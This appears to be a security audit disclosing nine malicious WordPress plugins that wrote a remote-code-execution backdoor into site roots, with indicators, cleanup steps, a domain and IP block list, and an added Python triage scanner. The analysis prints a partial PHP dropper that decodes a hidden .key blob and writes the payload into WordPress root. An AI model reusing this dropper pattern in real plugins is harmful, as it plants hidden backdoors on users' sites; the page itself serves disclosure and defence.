
Audit #48 Malicious Closed by wp.org

9 affected plugins · 80 combined active installs · 9 closed on wp.org · baseline → head (suite — 9 plugins) · closed 1d ago

Actor: SiteGuarding (SafetyBis Ltd.) — 2024 burner wave

Verdict: malicious — a previously-undocumented 2024 wave of nine SiteGuarding supply-chain burner plugins, each on its own throwaway wp.org account. It is the third operational phase of the SiteGuarding operation to be identified, but chronologically the middle one: it sits between the 2013–2020 27-plugin portfolio (audit #28) and the 2025–2026 burner wave (audits #25, #26, #42–#47). It was surfaced in June 2026 by a blob-decode code scan across the closed-plugin corpus; the payloads hide in randomly-named .key data files that a PHP-only grep never opens.

Seven of the nine are .key-file droppers: the activation hook runs glob(__DIR__."/*.key"), base64_decodes + gzuncompresses the blob into a struct, and writes its tools member — the SiteGuarding siteguarding_tools.php v1.7 RCE backdoor (the Task_savefile/Task_includefile primitive set, operator IPs 185.72.157.169-172) — into WordPress root under an operator-chosen name. The other two (seo-pack, geo-traffic-control-and-redirect) are larger SEOGuarding-branded suites that ship the same .key dropper plus tell-tale SiteGuarding assets (images/logo_siteguarding.svg, classes/sgAntiBot.php) and call safetybis.com.

Seven of the nine were closed by wp.org on a single day — 2024-12-09 — a coordinated takedown batch (the other two on 2024-07-10 and 2024-09-15), mirroring the 2020 portfolio sweep but, like it, never publicly disclosed. With this wave the known SiteGuarding footprint reaches 44 plugins across ~19 wp.org accounts.

80 installs across 9 plugins potentially exposed to compromised code.

Site owners should remediate immediately. Plugin author: see the steps below to clear this label.

If you run any of these 9 plugins on your site

See the Affected plugins table below for the full slug list. To check whether any are installed across your fleet:

wp plugin list --field=name | grep -Ex 'advanced-captcha-for-contact-form-7|antivirus-solution|avp-website-solution|bad-bot-blocker|geo-security-suit|geo-traffic-control-and-redirect|wp-admin-two-factor-authentication|wp-webdoctor|seo-pack'

For each match, remove the plugin. Note that wp plugin verify-checksums only reports whether the installed files match the wp.org release, and for these slugs the release itself carries the .key payload, so a clean checksum result is not a clean bill of health; it is useful only for spotting additional on-site tampering before you delete:

wp plugin verify-checksums <slug>
wp plugin deactivate <slug>
wp plugin delete <slug>

Patched builds for the major affected slugs are hosted at plugins.captaincore.io — see the cleanup instructions for site operators below for the full per-plugin URL list.

Cleanup instructions for site operators

If your site ever activated any of these nine plugins, treat it as having had a backdoor dropped into WordPress root — the plugin's activation hook wrote siteguarding_tools.php (the v1.7 RCE backdoor) into ABSPATH under an operator-chosen name, and that file persists after the plugin is deleted.

  1. Search WordPress root (and webanalyze/) for the v1.7 backdoor. The dropped file carries an operator-chosen name, so search by content rather than by the filename siteguarding_tools.php: look for Task_savefile / Task_includefile / the IP list 185.72.157.169-172 in any PHP file at the top level of ABSPATH and under webanalyze/. Delete it and the webanalyze/ directory.
  2. Delete the plugin directory and any leftover *.key file inside it.
  3. Block outbound traffic to siteguarding.com, *.siteguarding.com, safetybis.com, and cmsplughub.com, plus the IP ranges 185.72.157.0/24 and 198.7.59.0/24.
  4. Audit admin users and rotate WordPress, database, and SFTP/SSH credentials — Task_includefile grants arbitrary PHP execution, so assume full compromise of any site that ran one of these for any length of time.
  5. See the full SiteGuarding remediation checklist in the audit #27 writeup (the IOCs and cleanup steps are identical across all three phases of the operation).

The nine plugins are closed on wordpress.org, so no new installs are possible — but closure does not remove the dropped backdoor from existing sites. Active remediation is required.

The label clears automatically on the next wp beacon scan-deltas once the cleanup conditions above are met.

Affected plugins (9)

All plugins covered by this incident report. Combined exposure: 80 active installs across 9 slugs.

Plugin                               Active installs       Trunk version  wp.org status
advanced-captcha-for-contact-form-7  10                    1.0            Closed on wp.org
Antivirus Solution                   10                    2.21           Closed on wp.org
AVP Website Solution                 10                    1.7.14         Closed on wp.org
Bad Bot Blocker                      10                    1.6            Closed on wp.org
GEO Security Suite                   10                    1.4.1          Closed on wp.org
GEO Traffic Control and Redirect     10                    2.9.4          Closed on wp.org
WP Admin Two Factor Authentication   10                    1.0            Closed on wp.org
WP Webdoctor                         10                    2.2            Closed on wp.org
SEO Pack                             n/a (never archived)  1.1            Closed on wp.org

IOCs extracted (3)

Kind          Value                 Confidence
code_pattern  $json['tools']        medium
code_pattern  sgAntiBot             high
filename      logo_siteguarding.svg high

The 2024 SiteGuarding burner wave (audit #48)

Nine plugins, nine throwaway wp.org accounts, all closed by wp.org in 2024 — seven of them on the same day. None appear in the April-2026 news coverage or in the 2020-portfolio takedown; this wave was entirely undocumented until WP Beacon's closed-plugin blob scan (2026-06-15) decoded their .key payloads.

Plugin                               Account       Closed      Installs @ closure    Shape
advanced-captcha-for-contact-form-7  @idengod      2024-12-09  ~10                   .key dropper → siteguarding_tools.php v1.7
avp-website-solution                 @bowieraymon  2024-12-09  ~10                   .key dropper → v1.7
bad-bot-blocker                      @browwwny76   2024-12-09  ~10                   .key dropper → v1.7
wp-admin-two-factor-authentication   @mich4el1973  2024-12-09  ~10                   .key dropper → v1.7
wp-webdoctor                         @ckreg00      2024-12-09  ~10                   .key dropper → v1.7
geo-security-suit                    @antoniomel   2024-12-09  ~10                   .key dropper → v1.7
antivirus-solution                   @bigjohnnie   2024-12-09  ~10                   .key dropper → v1.7
geo-traffic-control-and-redirect     @devander     2024-09-15  ~10                   SEOGuarding suite + .key dropper
seo-pack                             @seodevteam   2024-07-10  n/a (never archived)  SEOGuarding suite + .key dropper

Every plugin in this wave sat in the "fewer than 10" install bucket at closure (8 of 9 recovered via Wayback; seo-pack was never archived). Unlike the 2026 wave (wp-advanced-math-captcha at 6,000+), the 2024 burners were uniformly tiny: the operator optimised for breadth and a low review profile, not install volume.

The .key delivery mechanism

Each plugin ships a single randomly-named *.key file (e.g. VtD8x.key, rP2UE6Yrl.key, 6jJv74zAQ.key). On activation:

register_activation_hook( __FILE__, 'acfcf7_activation' );
// inside the handler:
foreach ( glob( dirname(__FILE__)."/*.key" ) as $filename ) {
    $json = base64_decode( file_get_contents($filename) );
    $json = gzuncompress( $json );      // -> struct: name, tools, class, update
    ...                                 // (decode of the struct into an array elided here)
    $fp = fopen( ABSPATH.'/'.$json['name'], 'w' );   // target filename chosen by the operator
    fwrite( $fp, $json['tools'] );      // writes siteguarding_tools.php into WP root
    fclose( $fp );
    // also writes $json['class'] and (on cron) $json['update']
}

glob("*.key") means the random filename is irrelevant — the loader picks up whatever .key is present. The decoded tools member is siteguarding_tools.php v1.7 (dated 20 Mar 2020), playing the same role as the backdoor dropped by the 2026 burners' plugin.dat/tools.gzs and bundled inline in 15 of the 2020-portfolio plugins. It exposes Task_savefile / Task_showfile / Task_includefile (write+include arbitrary PHP = RCE), gated to operator IPs 185.72.157.169-172 with a PGP fallback, and self-updates from siteguarding.com/ext/panel_api/index.php.

This .key-glob vehicle is a new delivery TTP for the operation — distinct from the inline-bundled file (2020), the .dat/.gzs blobs (2026), and the wp-config.php include-injection (cls-lcp / code-quality, 2026). Same payload, new wrapper.
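A triage script for the two hunts this audit asks for: opening the .key blobs that a PHP-only grep skips (the delivery mechanism above) and finding the operator-named backdoor file the dropper leaves at the top level of ABSPATH and under webanalyze/ (the cleanup steps for site operators). This is an added example, not WP Beacon's or SiteGuarding's code. It reverses the dropper's base64_decode + gzuncompress (zlib format) and assumes the decoded struct is JSON, a step the page elides. The sample plugin, .key blob and dropped file it builds are constructed fixtures that contain marker strings only, no working backdoor, and the target filename wp-sg-core.php is a made-up stand-in for the operator-chosen name.

```python
"""Triage for the SiteGuarding .key dropper and its dropped backdoor.
Added example; not WP Beacon's or SiteGuarding's code.  Assumption: the struct
inside a .key blob is JSON (the audit only shows base64 -> gzuncompress -> array).
"""
import base64
import json
import tempfile
import zlib
from pathlib import Path

# Markers taken from the audit: the v1.7 primitives, the operator IPs, the self-update host.
BACKDOOR_MARKERS = (
    "Task_savefile", "Task_showfile", "Task_includefile",
    "185.72.157.169", "185.72.157.170", "185.72.157.171", "185.72.157.172",
    "siteguarding.com/ext/panel_api",
)


def decode_key_blob(raw: bytes):
    """Reverse the dropper: base64_decode -> gzuncompress (zlib) -> struct.
    Returns the struct as a dict, or None when the bytes are not such a blob."""
    try:
        packed = base64.b64decode(raw)
        plain = zlib.decompress(packed)  # PHP gzuncompress() reads zlib-wrapped data
        obj = json.loads(plain)          # assumption: JSON-encoded struct
    except (ValueError, zlib.error):     # bad base64, bad zlib, or non-JSON text
        return None
    return obj if isinstance(obj, dict) and "tools" in obj else None


def markers_in(text: str):
    """Which backdoor markers occur in a piece of PHP source (in BACKDOOR_MARKERS order)."""
    return [m for m in BACKDOOR_MARKERS if m in text]


def scan_key_files(plugins_dir):
    """Find every *.key under wp-content/plugins, decode it the way the activation
    hook does, and report the filename it would write under ABSPATH."""
    findings = []
    for key in sorted(Path(plugins_dir).rglob("*.key")):
        obj = decode_key_blob(key.read_bytes())
        if obj is None:
            continue
        findings.append({
            "key_file": str(key),
            "drops_as": obj.get("name"),    # the operator-chosen target filename
            "members": sorted(obj),         # expect name, tools, class, update
            "markers": markers_in(str(obj.get("tools", ""))),
        })
    return findings


def scan_root_php(abspath):
    """Look where the dropper writes: the top level of ABSPATH and webanalyze/.
    Matching is by content, because the dropped file's name is operator-chosen."""
    root = Path(abspath)
    hits = []
    for d in (root, root / "webanalyze"):
        if not d.is_dir():
            continue
        for php in sorted(d.glob("*.php")):
            found = markers_in(php.read_text(errors="replace"))
            if found:
                hits.append({"file": str(php), "name": php.name, "markers": found})
    return hits


def triage_site(abspath):
    """Both hunts over one WordPress install rooted at abspath."""
    return {
        "key_blobs": scan_key_files(Path(abspath) / "wp-content" / "plugins"),
        "dropped_backdoors": scan_root_php(abspath),
    }


def encode_key_blob(obj) -> bytes:
    """Mirror of decode_key_blob, used only to build the constructed fixture."""
    return base64.b64encode(zlib.compress(json.dumps(obj).encode()))


def build_demo_site() -> str:
    """Constructed fixture: a WordPress root with one .key dropper plugin and the
    file a previous activation would have left behind.  Payload strings are
    markers only, not working code; wp-sg-core.php is a made-up target name."""
    root = Path(tempfile.mkdtemp(prefix="sg-triage-"))
    plugin = root / "wp-content" / "plugins" / "bad-bot-blocker"
    plugin.mkdir(parents=True)
    (plugin / "bad-bot-blocker.php").write_text("<?php // plugin stub (constructed)\n")
    fake_tools = "<?php /* constructed stand-in: Task_savefile Task_includefile 185.72.157.170 */\n"
    (plugin / "VtD8x.key").write_bytes(encode_key_blob({
        "name": "wp-sg-core.php", "tools": fake_tools, "class": "<?php // stub", "update": "",
    }))
    (root / "index.php").write_text("<?php // clean WordPress index (constructed)\n")
    (root / "wp-sg-core.php").write_text(fake_tools)  # what an earlier activation leaves behind
    return str(root)


if __name__ == "__main__":
    print(json.dumps(triage_site(build_demo_site()), indent=2))
```

On a real install, call triage_site with the site's ABSPATH (for example /var/www/html); the drops_as field of each decoded blob tells you which filename to look for in root even when the backdoor has since been renamed or the plugin directory already deleted. Decoding by content rather than by the .key filename mirrors the dropper's own glob("*.key") logic, so a renamed blob is still caught.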

SEOGuarding-branded suites

seo-pack (rt-seo-* "realtime SEO" lineage) and geo-traffic-control-and-redirect are full plugins rather than thin droppers, and carry unambiguous SiteGuarding fingerprints in cleartext: images/logo_siteguarding.svg, classes/sgAntiBot.php, and safetybis.com calls — the same SEOGuarding sub-brand seen on the original portfolio's realtime-seo. They ship the .key dropper alongside the suite functionality.

Coordinated, undisclosed takedown

Seven of the nine were closed on 2024-12-09 in a single wp.org review action — the same coordinated-batch shape as the May–June 2020 portfolio sweep, and like it, with no public advisory, CVE, or news coverage. The closures carry closed_reason of security-issue (5) and guideline-violation (4); none disclose the backdoor.

Attribution

SiteGuarding. The decoded .key payload is the operator's own siteguarding_tools.php v1.7 backdoor (with its hardcoded operator IPs, PGP key, and siteguarding.com/ext/panel_api self-update); the two suites ship logo_siteguarding.svg + sgAntiBot + safetybis.com. Nine distinct empty-profile burner accounts (idengod, bowieraymon, browwwny76, mich4el1973, ckreg00, antoniomel, bigjohnnie, devander, seodevteam) used once each — the same single-plugin-per-burner pattern as the 2026 wave.

Where this sits in the operation

Phases are numbered in the order they were identified and listed here chronologically:

  • Phase 1 — 2013–2020 portfolio: 27 plugins under @siteguarding/@sgdevteam, closed May–June 2020 (audit #28).
  • Phase 3 — 2024 burner wave (this audit): 9 plugins / 9 accounts, closed Jul/Sep/Dec 2024. .key dropper.
  • Phase 2 — 2025–2026 burner wave: 8 plugins / 8 accounts, closed Oct 2025–Apr 2026 (audits #25, #26, #42–#47). .dat/.gzs droppers, wp-config injection, C2-proxy.

Total known footprint: 44 plugins, ~19 wp.org accounts, one continuously-maintained siteguarding_tools.php codebase (v1.7 → v2.4), C2 on siteguarding.com + safetybis.com + cmsplughub.com.